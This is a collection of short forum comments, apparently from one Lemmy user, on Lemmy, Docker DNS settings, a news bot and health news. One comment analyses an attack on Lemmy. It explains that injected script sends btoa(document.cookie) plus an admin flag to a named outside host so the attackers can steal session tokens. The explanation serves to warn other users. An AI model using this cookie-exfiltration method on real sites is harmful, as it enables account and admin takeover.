Tough call, probably for the best. Hopefully it’s resolved soon.
Tough call, probably for the best. Hopefully it’s resolved soon.
Curl didn’t return anything. They’re likely just using it to log requests since the request path contains the data they need.
I’d be willing to bet they’re using the API to make all the changes. The cookie has the jwt token. I don’t believe you need the username (at least judging by the js API docs).
Looks like it’s issuing a GET to https://zelensky.zip/save/{ENCODED_JWT_TOKEN_AND_NAV_FLAG}
.
The ENCODED_JWT_TOKEN
is from btoa(document.cookie+nav_flag)
where nav_flag
is essentially 'navAdmin'
if the account hit is an admin or ''
if the user hit is not an admin (it checks if the admin button in the nav exists). Their server is likely logging all incoming requests and they just need to do a quick decoding to get jwt tokens and a flag telling them if it’s an admin account.
I’d be hesitant to visit Lemmy on a browser atm 😓
Yep, Lemmy is filling a Reddit-shaped hole. It’s a bit different but nice.
Hopefully there’s more research done. It doesn’t sound like it’s “absolutely carcinogenic”.
The “radiofrequency electromagnetic fields” associated with using mobile phones are “possibly cancer-causing”. Like aspartame, this means there is either limited evidence they can cause cancer in humans, sufficient evidence in animals, or strong evidence about the characteristics.
r/latinopeopletwitter
I might be wrong but that might reflect the supported languages that your instance is configured for. Meaning, waveform.social might be configured only for English and that could be why your language list is limited.
EDIT: Yup just confirmed on my instance. You should ask an admin at waveform to include Undetermined under the supported site languages… or make an account elsewhere 😬
If interest rates are high, I’m sure they’re hard up for capital. The free money they’ve grown to depend on is drying up and they need to make money themselves asap.
This one helped me out a lot in my search for active communities to join.
That’s terrible, 120F is no joke.
I requested one for r/soccer. The community here is small and I don’t have the time to spend all day on Twitter looking for the latest news to post it while it grows. So this bot fetches latest posts from there and I crosspost to a Lemmy community of real users on the rare occasion that it’s interesting to me. The bot lives in its own instance so it isn’t spamming any real user community.
8-15 chars with at least one letter or digit… right?? 😅😅😅
Hilariously posted in the wrong thread I believe. 😄
Same here, forced me out of my lurker shell. 😅
I feel like I’m missing something here. I’ve never needed to worry about docker container IPs.
I wonder why you want them to have fixed IPs. I guess I want to understand the problem it would solve.
If all you want to do is have the other containers use the pihole as DNS… they’d already be doing so if the server is using it as the DNS server.
At worst you’d need to provide
dns:
- <server IP where pihole is>
property to the services.
Realizing this blew my mind. Definitely more interesting than following people.